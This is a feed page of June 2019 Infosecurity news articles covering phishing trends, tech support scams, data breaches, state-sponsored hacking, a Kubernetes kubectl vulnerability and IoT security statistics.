Info Security

Subscribe to Info Security  feed
Updated: 1 hour 15 min ago

Dramatic Increase in Abuse of File Sharing Services

Wed, 06/26/2019 - 10:55
Dramatic Increase in Abuse of File Sharing Services

Security researchers are warning of a “dramatic” increase in the exploitation of legitimate file sharing services to deliver malware in email-based attacks, especially OneDrive.

FireEye claimed in its latest Email Threat Report for Q1 2019 that services including WeTransfer, Dropbox, Google Drive and OneDrive are increasingly being used to host malicious and phishing files.

However, while Dropbox was most commonly used of all the services, OneDrive is catching up fast. From hardly being used in any attacks in Q4 2018, it shot up by over 60% in the intervening months.

Hackers are using such services as they bypass the initial domain reputation checks made by security tools.

Detection filters are also challenged by the use of “nested emails.” With this tactic, a first email contains a second email as attachment, which in turn contains the malicious content or URL.

FireEye also warned of a 17% increase in total phishing emails spotted over the previous quarter, with the most-spoofed brands including Microsoft, followed by OneDrive, Apple, PayPal and Amazon.

Hackers are increasingly using HTTPS in phishing attacks featuring URLs in a bid to trick users into clicking. FireEye observed a 26% quarter-on-quarter increase in the tactic, which exploits the consumer perception that HTTPS is inherently secure.

In fact, the FBI was recently forced to issue an alert warning that HTTPS and padlock icons in the address bar are not enough to prove the authenticity of sites.

It said that users should resist clicking on links in unsolicited emails, it added.

Finally, FireEye warned that cyber-criminals are expanding their repertoire when it comes to BEC attacks.

In one version they target the payroll department with requests to change the bank details of senior executives with the hope of diverting their salary. In another, they focus on accounts payable but pretend to be trusted suppliers who are owed money, instead of the CEO/CFO.

Categories: Cyber Risk News

Recipe for Disaster as Tech Support Scammers Use Paid Search

Wed, 06/26/2019 - 09:07
Recipe for Disaster as Tech Support Scammers Use Paid Search

Tech support gangs have been spotted using paid search to reel in unsuspecting victims looking for food-related content online, according to Malwarebytes.

The security vendor spotted scammers buying ads for Google and Bing which it said are designed to lure older netizens searching for food recipes.

“This scheme has actually been going on for months and has intensified recently, all the while keeping the same modus operandi,” it said. “Although not overly sophisticated, the threat actors behind it have been able to abuse major ad platforms and hosting providers for several months.”

As paid search entries are displayed at the top of search listings, users are more likely to click through. Doing so took them to specially created food blogs built by the scammers, complete with comments on the various articles.

“However, upon closer inspection, we can see that those sites have basically taken content from various web developer sites offering paid or free HTML templates,” said Malwarebytes.

In the right circumstances, the user is redirected to a browlock, or fake warning page, which is common in tech support scams. It checks for browser and OS and displays a relevant message claiming the user’s machine has been blocked because of a virus alert from Microsoft.

Calling the number, the white hats spoke to tech support scam ‘technicians’ who tried to sell them expensive support packages on the back of the fake AV alert. That company was listed as A2Z Cleaner Pro (AKA Coretel Communications).

Malwarebytes notified Google and Bing about the fraudulent ads and GoDaddy about the fake blogs and reiterated the importance of industry cooperation in tackling the tech support threat.

It’s unclear exactly how widespread the campaign was, but one URL shortening service used by one of the websites revealed over 50,000 hits in a single week in early May, mainly in the US.

Categories: Cyber Risk News

ICO Issues Notices After Met Police Contravenes GDPR

Wed, 06/26/2019 - 08:46
ICO Issues Notices After Met Police Contravenes GDPR

The UK’s privacy watchdog has been forced to issue the Metropolitan Police (MPS) with two enforcement notices after it failed in its obligations under the GDPR and the previous data protection regime.

The Met has not been responding promptly to citizens’ subject access requests (SARs) within the required calendar month, according to Information Commissioner’s Office (ICO) director of data protection complaints and compliance, Suzanne Gordon.

In fact, the police force was found to have more than 1100 open requests, with almost 680 of them over three months old.

“As people become more aware of their information rights, we recognise there has been a significant rise in SARs across all sectors, including to police forces and other law enforcement agencies. And we are also aware of the administrative impact of the increased workload on police forces in responding to these requests. But this should not come at a cost to people’s data rights,” she explained.

“We have … asked the MPS to make changes to its internal systems, procedures or policies, so that people are kept up to date on any delays that may affect their data protection rights and how the situation is being addressed.”

The Met claims to have a recovery plan in place and assured the ICO that the backlog of open SARs would be cleared within four months.

Police forces should log all requests, verbal and in writing, and make the public aware of any potential delays, Gordon explained. However, the 28-day clock only starts once all necessary information has been collected to establish the identity of the requester.

The police can also limit the amount of info they provide if it may prejudice an investigation or similar, she added.

The enforcement notices were served under the Data Protection Act 1998 and the Data Protection Act 2018, the latter of which is the UK’s version of the GDPR.

Categories: Cyber Risk News

Fake Ads that Lock Browsers Target Elders

Tue, 06/25/2019 - 18:56
Fake Ads that Lock Browsers Target Elders

A scam that was discovered last month that involved cyber-criminals invading Microsoft Azure Cloud Services reportedly remains ongoing. According to Malwarebytes’ threat intelligence team, the scam has continued but with a new trick: utilizing paid search results.

Instead of targeting victims through false emails claiming to be from Microsoft or Apple, scammers have been buying ads displayed on major internet portals to target an older demographic to drive traffic to decoy blogs that then redirects victims to a browser lock page, according to researchers. 

“To support their scheme, the scammers have created a number of food-related blogs. The content appears to be genuine, and there are even some comments on many of the articles,” the researchers wrote. 

Though it’s been going on for months and the method of deception remains the same, researchers said the scheme has intensified recently. “Although not overly sophisticated, the threat actors behind it have been able to abuse major ad platforms and hosting providers for several months,” the researchers wrote. 

Scammers tricked users into believing their computers have been compromised via these blogs. As a result, the crooks were able to convince users that they needed expensive but ultimately useless “support packages” in order to clean up their computers. These specious offerings, not surprisingly, do next to nothing when it comes to protecting a user’s computer. 

"Tech support scams are one of the top threats affecting older folks, costing consumers millions of dollars in losses. Despite many takedowns and arrests in recent years, this industry is still very active and using the same social engineering techniques via fake browser alerts,” the Malwarebytes Threat Intelligence team told Infosecurity.

“It is important to remember that those browser lockers are not harmful in and out of themselves and that they can be closed safely. Victims that ended up calling the alleged Microsoft technicians for assistance should change their passwords, scan their machine for malware, revert any payment made, as well as monitor their bank statements closely.”

Categories: Cyber Risk News

'Dashboard Act' Would Force Orgs to Disclose Data

Tue, 06/25/2019 - 18:20
'Dashboard Act' Would Force Orgs to Disclose Data

On Monday, Sens. Mark Warner (D-Va.) and Josh Hawley (R-Mo.) proposed the Designing Accounting Safeguards to Help Broader Oversight and Regulations on Data, also known as the DASHBOARD Act, which would put strict requirements on data operators, according to CNBC News.

“For years, social media companies have told consumers that their products are free to the user. But that’s not true – you are paying with your data instead of your wallet,” Warner reportedly said in a press release.

Those companies identified as data operators are defined as having more than 100 million active monthly users, which is most social media platforms and tech giants like Google. If voted into law, the new requirements would mandate that data operators “provide each user of the commercial data operator with an assessment of the economic value that the commercial data operator places on the data of that user; and in a clear and conspicuous manner.”

Data operators would also need to convey to each individual user the exact types of data that are being collected by either the company itself or a partner. “The concept of forcing large companies such as Facebook, Twitter, and Google to show their cards and actually tell people what their personal data is worth to the company is a novel one,” wrote Dennis Fisher in a June 24 blog post for Duo Security

“Most users of those companies’ services likely have little if any idea of how much data is collected by them, let alone what the monetary value of that information is. But those companies most certainly do, as their business models depend upon it,” Fisher continued.

In response to the news, CEO and president of the Internet Association Michael Beckerman wrote, “Data helps businesses – across all industries and of all sizes and business models – provide consumers with better products and services. We are encouraged by policymaker interest in addressing consumer privacy and providing Americans with greater transparency and control over how their data is used and protected. The internet industry supports a comprehensive, economy-wide federal privacy law that covers all companies – from social media sites to local grocery stores to data brokers – to give consumers the protections and rights they need to take full control of the data they provide to companies.”

Categories: Cyber Risk News

Breach at Dominion National Likely Began in 2010

Tue, 06/25/2019 - 17:42
Breach at Dominion National Likely Began in 2010

Dental and vision benefits insurer and administrator Dominion National announced a data security incident in which the personal information of members was potentially compromised.

“Safeguarding the privacy of your personal information is a top priority for us, and we make every effort to protect your information. Despite these efforts, Dominion National experienced a data security incident,” Dominion National president Mike Davis wrote in a company message.

The unauthorized access might have started as long ago as August 2010, according to the notice. “On April 24, 2019, through Dominion National's investigation of an internal alert and with the assistance of a leading cyber security firm, Dominion National determined that an unauthorized party may have accessed some of its computer servers. The unauthorized access may have occurred as early as August 25, 2010. Dominion National moved quickly to clean the affected servers.”

The company reports that it currently has no evidence that data was actually misused or wrongfully accessed. “However, we began mailing notification letters to potentially affected individuals on June 21, 2019, and we have established a dedicated incident response line to answer any questions.”

The data that was potentially accessed could include the enrollment and demographic information for current and former members. In addition to members of both Dominion National and Avalon Insurance, others who are affiliated with the organizations could have also had their data compromised. 

“The servers may have also contained personal information pertaining to plan producers and participating healthcare providers. The information varied by individual, but may include names in combination with addresses, email addresses, dates of birth, Social Security numbers, taxpayer identification numbers, bank account and routing numbers, member ID numbers, group numbers, and subscriber numbers,” according to the announcement.

Categories: Cyber Risk News

#DISummit19: Fraudsters Shifting Focus to Mobile Attacks

Tue, 06/25/2019 - 15:06
#DISummit19: Fraudsters Shifting Focus to Mobile Attacks

Speaking at the EMEA Digital Identity Summit 2019 in London Rebekah Moody, fraud and identity market planner at LexisNexis Risk Solutions, reflected on the findings of the new ThreatMetrix EMEA Cybercrime Report.

Moody discussed how the report, based on data from attacks between January-March 2019, revealed EMEA to be one of the most mobile regions in the world, with 71% of transactions originating from a mobile device in EMEA, compared to 55% globally.

That was a key factor in driving a lower overall attack rate in the EMEA region, she added, because mobile transactions are generally “safer than desktop transactions,” with attack rates on mobile five-times lower than desktop.

“However, we have started to see some really interesting shifts and evolution in the way that fraudsters are using mobile,” Moody added, explaining that fraudsters have recently begun adapting to changing consumer behaviors and are now turning their focus to mobile attacks.

“It’s really interesting how fraudsters are using mobile as a facilitator to develop different ways to attack user accounts.”

The industry that is currently most at risk from rising mobile attacks is the media industry, Moody said, explaining that “fraudsters are likely using media as an identity-testing ‘test bed’ because it’s generally an easier target than the e-commerce or financial service industries.”

Categories: Cyber Risk News

#DISummit19: Online Fraud Becoming More Complex & Sophisticated

Tue, 06/25/2019 - 13:34
#DISummit19: Online Fraud Becoming More Complex & Sophisticated

Speaking at the EMEA Digital Identity Summit 2019, Stephen Topliss, vice-president, fraud & identity at LexisNexis Risk Solutions, said that online fraud is becoming more intricate and sophisticated.

“Fraud has become much, much more complex,” he said, pointing to a particular rise in “networked fraud,” which consists of cross-border fraud, omi-channel fraud and cross-industry fraud.

“With cross-border fraud, attackers are using VPN and proxies to hide where they are originating from.

“We’re also seeing omni-channel fraud, so while in the past an attack might have focused specifically on an online banking channel, fraudsters are getting much more sophisticated and are using channels to investigate and learn more about a target or their account.”

Then there’s cross-industry fraud, Topliss added, which involves fraud attacks that first target one industry and then become stepping stones to target other industries.

There have also been recent rises in the amount of social engineering being used in fraud attacks, Topliss said. “It’s really becoming the new norm; in the financial sector, the early years of fraud really focused on third party fraud, but now there are so many layers of defense that are actually working quite well, so fraudsters have figured out that the human is the weakest link.”

Then there’s the rise in bot activity, with bots continuing to be a bigger and bigger problem within the fraud threat landscape. “It’s not just the sheer volume of them,” Topliss explained, “they are becoming more sophisticated and they’re invading traditional layers of defense. By doing that, they’re really able to do credential testing.”

Some emerging fraud opportunities have also come to light, Topliss said. “What’s interesting on the emerging fraud side of things is that we’re seeing both completely new types of fraud that are associated with new types of industries,” such as the ride-sharing industry, and fraud that targets established industries offering services “that historically were not susceptible to fraud or not targeted by fraudsters, but are suddenly becoming really, really interesting.”

Categories: Cyber Risk News

#DISummit19: Fraudsters Always React & Respond to Better Security

Tue, 06/25/2019 - 12:35
#DISummit19: Fraudsters Always React & Respond to Better Security

At the EMEA Digital Identity Summit 2019 in London, Chris Parker, ecrime and digital lead, fraud response and recovery at the Royal Bank of Scotland, warned that cyber-criminals will always react and respond to better security methods, and so industry collaboration is key to staying ahead of them.

“There’s an awful lot of change going on, and it’s a cat and mouse game,” he said. “We need to recognize that everything we do [to prevent cybercrime] will cause a reaction [amongst cyber-criminals].”

Parker explained that security efforts have always had to evolve and improve to try and keep data safe from fraudsters, but as they have, attackers have also continued to adapt with new tactics that circumvent any improvements that have been made.

Fraudsters have come to realize, as their infrastructures have been taken down or taken over by law enforcement and their profits affected, “that they are not always the best at doing everything, and so they have started outsourcing their efforts to find experts on the black market.

“It’s taken us to a place where we’ve increasingly got a much better visibility of what’s happening, but fraudsters have found ways in which they can really focus on the skills need they need.”

For that reason, an ‘us alone’ approach to security is not enough to prevent online fraud, and “we need to work across industry with law enforcement and peers.”

There is a lot of value in sharing threat intelligence data with each other, Parker added, because “we’ve seen that by sharing that intelligence and seeing what is affecting your peers before it impacts you, and vice-versa, you gain strength. Fraudsters are doing that – fraudsters are working in groups. If they can work in a collective, then we absolutely have to work as a collective to try and stop them.”

Categories: Cyber Risk News

China Blamed for APT Attacks on Global Telcos

Tue, 06/25/2019 - 10:20
China Blamed for APT Attacks on Global Telcos

Security researchers have uncovered a major new two-year state-sponsored attack against global telcos, most likely linked to China’s Ministry of State Security (MSS).

Boston-based vendor Cybereason claimed that the group used tools and techniques associated with APT10 to obtain Call Detail Records (CDRs): metadata including source, destination, and duration of calls, physical location and device details that could help them spy on individuals.

“Having this information becomes particularly valuable when nation-state threat actors are targeting foreign intelligence agents, politicians, opposition candidates in an election, or even law enforcement,” it argued in a lengthy blog post.

“Operation Soft Cell” has been ongoing since at least 2017, targeting multiple global telcos to compromise individuals in over 30 countries worldwide.

“The attack began with a web shell running on a vulnerable, publicly-facing server, from which the attackers gathered information about the network and propagated across the network. The threat actor attempted to compromise critical assets, such as database servers, billing servers, and the active directory. As malicious activity was detected and remediated against, the threat actor stopped the attack,” Cybereason explained.

“The second wave of the attack hit several months later with similar infiltration attempts, along with a modified version of the web shell and reconnaissance activities. A game of cat and mouse between the threat actor and the defenders began, as they ceased and resumed their attack two more times in the span of a four-month period.”

Among the tools used by the attackers were: the China Chopper web shell, initially detected on an IIS server; a modified Nbtscan tool designed to find NetBIOS name servers; a modified version of mimikatz to steal credentials; fileless techniques like WMI and PsExec to move laterally; the PoisonIvy RAT; and more.

Care was taken throughout to maintain persistence and stay hidden.

“The threat actor abused the stolen credentials to create rogue, high-privileged domain user accounts which they then used to take malicious action. By creating these accounts, they ensured they would maintain access between different waves of the attack,” Cybereason explained.

“Once the threat actor regains their foothold, they already have access to a high-privileged domain user account. This significantly reduces the ‘noise’ of having to use credential dumpers repeatedly, which helped them evade detection.”

Categories: Cyber Risk News

UK Firms Riddled With Vulnerable Open Source Software

Tue, 06/25/2019 - 09:02
UK Firms Riddled With Vulnerable Open Source Software

There’s been a 71% increase in open source-related breaches over the past five years, with UK firms downloading on average 21,000 software components known to be vulnerable over the past 12 months, according to Sonatype.

The DevOps automation firm’s annual State of the Software Supply Chain report features global analysis from 36,000 open source project teams, 3.7 million open source releases, 12,000 commercial engineering teams and two surveys.

It claimed supply and demand of open source components is at an all-time high, with over 146 billion download requests of Java components in 2018: a 68% increase on 2017 figures.

Yet while these downloads help to speed up DevOps, they also introduce potential risk. The report found that over 51% of Java package downloads have a known security vulnerability, as do 1 in 10 Java component releases.  

The 21,000 open source components UK firms downloaded containing known software vulnerabilities amounts to nearly 9% of all downloads made last year. More worrying still: nearly a third (30%) of these were critical vulnerabilities.

The report also highlighted the number of firms using the infamous vulnerable Apache Struts component responsible for the Equifax breach which affected an estimated half of all adult Americans.

It revealed that downloads of the component actually increased by 11% in the year following the 2017 breach — amounting to 2.1m each month.

However, there was some cause for optimism: the report revealed 295 open source projects with exemplary coding practices, using automated tools to remediate known vulnerabilities quicker and update dependencies.

"We have long advised business that they should rely on the fewest open source components suppliers with the best track records in order to develop the highest quality and lowest risk software,'' said Wayne Jackson, CEO of Sonatype. “For organizations who tame their software supply chains through better supplier choices, component selection, and use of automation, the rewards revealed in this year’s report are impressive.”

Categories: Cyber Risk News

Social Engineering Forum Suffers Major Breach

Tue, 06/25/2019 - 08:41
Social Engineering Forum Suffers Major Breach

An online forum focused on discussion of all things social engineering has been breached, with the details of tens of thousands of account holders compromised.

Social Engineered administrator “Snow101” explained to users in a post late last week that the hackers exploited a vulnerability in open source forum software MyBB.

The admin claimed they had been forced to move the platform over to XenForo, asking users to chip in to help pay for the migration.

The breach itself happened on June 13, 2019 and compromised 89,392 accounts, according to information on HaveIBeenPwned.

It claimed the details were published on a rival hacking forum, and included around 89,000 unique email addresses linked to 55,000 users and other tables in the same database.

“The exposed data also included usernames, IP addresses, private messages and passwords stored as salted MD5 hashes,” it added.

Tripwire vice president, Tim Erlin, warned that, ironically enough, email addresses are often used in follow-on phishing raids and other social engineering attacks.

“This type of sensitive data can be used to the benefit of the attacker in a variety of ways, including identity theft and impersonation,” he added.

“MD5 is not a secure algorithm for hashing passwords. It has well-known flaws and is generally understood to be insufficient for protecting sensitive data of any kind."  

However, the very nature of the forum may well mean hackers have a hard time monetizing the data, Erlin claimed.

"If you were going to choose a user base that’s especially difficult to target with phishing and other social engineering-based attacks, this would certainly be near the top of the list,” he said.

Categories: Cyber Risk News

Botnet Abusing Android Debug Bridge, SSH is Back

Mon, 06/24/2019 - 17:32
Botnet Abusing Android Debug Bridge, SSH is Back

A new cryptocurrency-mining botnet malware is abusing Android Debug Bridge (ADB) and SSH, according to Trend Micro.  

“This attack takes advantage of the way open ADB ports don’t have authentication by default, similar to the Satori botnet variant. This bot’s design allows it to spread from the infected host to any system that has had a previous SSH connection with the host," the researchers wrote.

"The use of ADB makes Android-based devices susceptible to the malware. We detected activity from this malware in 21 different countries, with the highest percentage found in South Korea.”

The attack vector is one that has been abused before. Last year Juniper Threat Labs identified some of the vendors that had shipped ADB enabled.

“The number of publicly vulnerable devices has declined from about 40,000 devices one year ago to about 30,000 devices today. Most of the remaining vulnerable devices are located in Korea, Taiwan, Hong Kong and China,” said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks.

“It should be noted that some of the vulnerable devices are set-top boxes used for IPTV, not mobile phones. It is our speculation that most of the phones are, or become, vulnerable due to enabling the Android Debug Bridge during device rooting, a process which allows a locked down device to move freely between service providers.”

Because Android devices are beholden to their carriers or device manufacturers, Sam Bakken, senior product marketing manager, OneSpan, said it can be difficult for the general user to keep devices secure.

“Even if they wanted to harden their device with security updates or more secure configurations they simply can’t. The general layperson is becoming more aware of security and privacy issues as it relates to the mobile devices and apps they use,” Bakken said.

“Security is becoming a more important criterion in consumer decisions about which devices and apps they will and will not use. Savvy organizations are responding, building security into their mobile apps with technologies, such as app shielding and other in-app protections. This not only protects a developer’s intellectual property/app but also provides at least one safe haven for their users so they can rest easy knowing at least their usage of that one app is secure and protected."

Categories: Cyber Risk News

Incomplete Fix Leads to New Kubernetes Bug

Mon, 06/24/2019 - 17:11
Incomplete Fix Leads to New Kubernetes Bug

A new high-severity Kubernetes vulnerability has been discovered, according to security announcement on Securelists.org.

As part of the ongoing Kubernetes security audit sponsored by the Cloud Native Computing Foundation, the Kubernetes product security team announced a new high-severity vulnerability (CVE-2019-11246) that impacts kubectl, the command line interface used to run commands against Kubernetes clusters.

“Another security issue was discovered with the Kubernetes kubectl cp command that could enable a directory traversal such that a malicious container could replace or create files on a user’s workstation. The vulnerability is a client-side defect and requires user interaction to be exploited. The issue is high severity and upgrading kubectl to Kubernetes 1.12.9, 1.13.6, and 1.14.2 or later is encouraged to fix this issue,” wrote Joel Smith.

To determine whether you are vulnerable, Smith said to run kubectl version --client. Any versions other than client version 1.12.9, 1.13.6 or 1.14.2 are vulnerable and should be updated.

“This vulnerability stems from incomplete fixes for a previously disclosed vulnerability (CVE-2019-1002101). This vulnerability is concerning because it would allow an attacker to overwrite sensitive file paths or add files that are malicious programs, which could then be leveraged to compromise significant portions of Kubernetes environments,” said Wei Lien Dang, co-founder and vice president of product at StackRox.

“This type of exploit shows how a client-side vulnerability could be used to potentially compromise production environments, especially since we have observed that best practices to mitigate against this type of threat vector are not always followed. For example, users may be running kubectl on production nodes or without appropriate role-based access control to limit access to the entire cluster or with elevated local system permissions."

Because upgrades depend on the actions of individuals users, the fix can be harder to enforce, and Dang expects that this will not be the only vulnerability disclosed as a result of the security audit.

“These disclosures, along with the work by the Kubernetes product security team and broader community, will ensure that Kubernetes continues to be the most secure container orchestration platform.”

Categories: Cyber Risk News

Incomplete Fix Leads to New Kubernetes Bug

Mon, 06/24/2019 - 17:11
Incomplete Fix Leads to New Kubernetes Bug

A new high-severity Kubernetes vulnerability has been discovered, according to security announcement on Securelists.org.

As part of the ongoing Kubernetes security audit sponsored by the Cloud NativeComputing Foundation, the Kubernetes product security team announced a new high-severity vulnerability (CVE-2019-11246) that impacts kubectl, the command line interface used to run commands against Kubernetes clusters.

“Another security issue was discovered with the Kubernetes kubectl cp command that could enable a directory traversal such that a malicious container could replace or create files on a user’s workstation. The vulnerability is a client-side defect and requires user interaction to be exploited. The issue is high severity and upgrading kubectl to Kubernetes 1.12.9, 1.13.6, and 1.14.2 or later is encouraged to fix this issue,” wrote Joel Smith.

To determine whether you are vulnerable, Smith said to run kubectl version --client. Any versions other than client version 1.12.9, 1.13.6 or 1.14.2 are vulnerable and should be updated.

“This vulnerability stems from incomplete fixes for a previously disclosed vulnerability (CVE-2019-1002101). This vulnerability is concerning because it would allow an attacker to overwrite sensitive file paths or add files that are malicious programs, which could then be leveraged to compromise significant portions of Kubernetes environments,” said Wei Lien Dang, co-founder and vice president of product at StackRox.

“This type of exploit shows how a client-side vulnerability could be used to potentially compromise production environments, especially since we have observed that best practices to mitigate against this type of threat vector are not always followed. For example, users may be running kubectl on production nodes or without appropriate role-based access control to limit access to the entire cluster or with elevated local system permissions."

Because upgrades depend on the actions of individuals users, the fix can be harder to enforce, and Dang expects that this will not be the only vulnerability disclosed as a result of the security audit.

“These disclosures, along with the work by the Kubernetes product security team and broader community, will ensure that Kubernetes continues to be the most secure container orchestration platform.”

Categories: Cyber Risk News

Ethics and Compliance Programs Growing More Mature

Mon, 06/24/2019 - 16:13
Ethics and Compliance Programs Growing More Mature

Ethics and compliance programs are trending up, driven in large part by strong support from top executives, according to the 2019 Definitive Corporate Compliance Benchmark Report, published by NAVEX Global.

The research revealed that when leadership buys in to the strategic value of ethics and compliance programs, there is not only a greater likelihood of success but also an increased perception of organizational ethics. Strong executive backing also leads to greater program maturity and enables adoption of ethics and compliance technologies that improve program performance.

When asked whether the organization was "always ethical," only 25% of respondents with basic ethics and compliance programs said yes, and only 48% of all respondents noted that senior managers valued ethics and compliance as an important part of a comprehensive risk management strategy that has a proven return on investment.

The other 52% said that their programs were viewed primarily as an insurance policy or a necessary evil. While 85% of respondents reported using one or more automated solutions in their programs, organizations that use up to five of these solutions report increased ability to prevent violations.

In addition, 85% of respondents said a “centralized repository with easy access to the most current versions” was valuable or very valuable, and 78% rated “improved version control, reduced redundancy or increased accuracy of policies” equally as valuable, according to the report.

“It’s obvious to employees when leadership believes in the strategic value and measurable ROI of ethics and compliance programs. Leaders who view compliance programs as insurance policies or necessary evils – as many do, particularly within less-mature organizations – are sending the wrong message to their workforce,” said Carrie Penman, chief compliance officer and senior vice president, advisory services, NAVEX Global.

Additionally, 71% of respondents overall and 91% of those organizations with advanced programs offered an anonymous reporting channel, which is widely considered something every organization should have at this point.

Categories: Cyber Risk News

US Adds AMD Joint Venture to Entity List

Mon, 06/24/2019 - 10:40
US Adds AMD Joint Venture to Entity List

The US Department of Commerce has added five more Chinese organizations onto the same Entity List as Huawei over national security fears, including an AMD joint venture.

The department’s Bureau of Industry and Security (BIS) said the changes to the list, which will prevent US firms from doing business or selling components to them, will take effect from today.

That will be a headache especially for AMD, which set up a JV with Tianjin Haiguang Advanced Technology Investment Company (THATIC), aka Higon, back in 2016 to sell its x86 chips in China.

Two other companies on the list — Sugon and the Wuxi Jiangnan Institute of Computing Technology — build exascale supercomputers which the US government believes have military purposes. The latter is owned by the 56th Research Institute of the General Staff of the PLA, with a mission “to support China's military modernization,” according to the US government.

“Under § 744.11(b) (Criteria for revising the Entity List) of the EAR, entities for which there is reasonable cause to believe, based on specific and articulable facts, have been involved, are involved, or pose a significant risk of being or becoming involved in activities that are contrary to the national security or foreign policy interests of the United States, and those acting on behalf of such persons, may be added to the Entity List,” the notice said.

Sugon is said to be the majority owner of Higon, while the two remaining entities on the list are: Chengdu Haiguang Integrated Circuit (aka, Hygon and Chengdu Haiguang Jincheng Dianlu Sheji) and Chengdu Haiguang Microelectronics Technology (aka HMC and Chengdu Haiguang Wei Dianzi Jishu).

The new organizations join Huawei and ZTE on the list, which can be seen in the wider context of the Trump administration’s ramping up of pressure on the Chinese government over trade and national security.

Last week, the US Consumer Technology Association (CTA) complained that Trump’s much-derided tariffs would hit US consumers hardest, rather than the Chinese firms the US President wants to punish.

It claimed the average smartphone imported from China would increase in price by $70 (22%) if another proposed tariff of 25% on $300bn of Chinese goods is introduced.

“Tariffs are taxes, paid by American consumers —and these new tariffs would be a burden on American families just as they start back-to-school shopping,” said Gary Shapiro, CEO of the CTA.

“US consumers, not China, pay the price for tariffs — what more proof does the White House need? It’s time for this administration to put American small businesses, workers and families first and make a deal with China.”

Categories: Cyber Risk News

Phishing Attack Exposes PII on 645,000 Oregonians

Mon, 06/24/2019 - 09:45
Phishing Attack Exposes PII on 645,000 Oregonians

Over 600,000 Oregon residents have been told their personal information may have been compromised after a successful phishing campaign against employees of the state’s Department of Human Services (DHS).

The agency is sending 645,000 clients breach notices following a January 2019 incident, it said in a statement last week.

Nine DHS employees clicked through in a phishing email sent early on in the month, giving hackers access to their accounts.

“Beginning January 9, 2019, these nine employees started reporting problems. All affected accounts were located and access to the nine affected accounts was stopped by January 28, 2019,” it continued. “On January 28, 2019 the department and the Enterprise Security Office Cyber Security team confirmed that the phishing incident was a data breach.”

Although no additional malware was downloaded and no further accounts were compromised, investigators determined that the incident may have exposed as many as two million emails to the attackers.

“Most client information involved in the breach was in email attachments, like reports. The exposed client information includes first and last names, addresses, dates of birth, Social Security numbers, case numbers, personal health information, and other information used in DHS programs,” the DHS notice continued.

“The personal health information includes ‘Protected Health Information,’ or PHI, covered under the Health Insurance Portability and Accountability Act (HIPAA). Not all of these information types was exposed for each person.”

Although the DHS claimed to regularly patch systems, complete independent security assessments and even regularly train staff, the incident highlights the challenge of mitigating the phishing threat.

Verizon claimed in its most recent Data Breach Investigations Report (DBIR) that a third (32%) of breaches were linked to phishing attacks last year.

Categories: Cyber Risk News

US Warns of Destructive Iranian Cyber-Attacks

Mon, 06/24/2019 - 08:30
US Warns of Destructive Iranian Cyber-Attacks

A US government security agency has ratcheted up tension with Iran by warning that escalating state-sponsored attacks could turn destructive.

The Cybersecurity and Infrastructure Security Agency (CISA) director, Christopher Krebs, said in a statement dated Saturday that Iranian “regime actors and proxies” had ramped up malicious cyber-activity against US government agencies and industries of late.

“We will continue to work with our intelligence community and cybersecurity partners to monitor Iranian cyber activity, share information, and take steps to keep America and our allies safe,” he continued.

“Iranian regime actors and proxies are increasingly using destructive 'wiper' attacks, looking to do much more than just steal data and money. These efforts are often enabled through common tactics like spear phishing, password spraying, and credential stuffing. What might start as an account compromise, where you think you might just lose data, can quickly become a situation where you've lost your whole network.”

Iran has indeed been pegged for several destructive cyber-attacks over recent years, most notably the Shamoon attack of 2012 on Saudi state oil giant Saudi Aramco which is said to have wiped the hard drives of over 30,000 machines.

Tensions between the US and Iran have risen since Donald Trump tore up the previous administration’s nuclear deal with the Islamic Republic and imposed economic sanctions which have emboldened hardliners in Tehran.

After Iran shot down an unmanned US drone last week the world is waiting for an American military response. A new report citing “two former intelligence officials” claimed that a retaliatory strike came online on Thursday evening.

It targeted a cyber-espionage group linked to the Iranian Revolutionary Guard Corps, the report claimed.

“In times like these it's important to make sure you've shored up your basic defenses, like using multi-factor authentication, and if you suspect an incident — take it seriously and act quickly. You can find other tips and best practices for staying safe online here,” concluded Krebs.

Categories: Cyber Risk News

66% of Homes in North America Have Multiple IoT Devices

Fri, 06/21/2019 - 18:19
66% of Homes in North America Have Multiple IoT Devices

North American homes have the highest density of internet of things (IoT) devices of any region in the world, according to researchers at Stanford University and Avast.

Together, Stanford University and Avast have published findings of their research in a paper entitled All Things Considered, which analyzes the global state of IoT. The survey was based on “data collected from user-initiated network scans of 83M devices in 16M households,” the report said.

“Home IoT is better characterized by smart TVs, printers, game consoles, and surveillance devices – devices that have been connected to our home networks for more than a decade,” the report said.

“These are the kinds of devices that still support weak credentials for old protocols: work appliances are the device type with the highest fraction of weak FTP credentials; surveillance devices are the worst for telnet credentials. Improving the security posture of these devices remains just as important as ensuring that new technologies are secure – our home networks are only as secure as their weakest link.”

Notably, 66% of homes in North America possess at least one IoT device, more than a quarter more than the global average of 40%. Additionally, 25% of North American homes boast more than two devices.

With more than 14,000 IoT manufacturers the world over, 94% of all IoT devices are manufactured by as few as 100 vendors.

When looking at devices such as game consoles, there was little variance across the world in the most popular vendors, with Microsoft and Nintendo taking the top two spots. Open or weak FTP credentials were the top vulnerability. The research found that over 7% of all IoT devices still support these and telnet protocols, making them especially vulnerable.

“There already exists a complex ecosystem of Internet-connected embedded devices in homes worldwide, but that these devices are different than the ones considered by most recent work,” the researchers wrote.

Categories: Cyber Risk News

Pages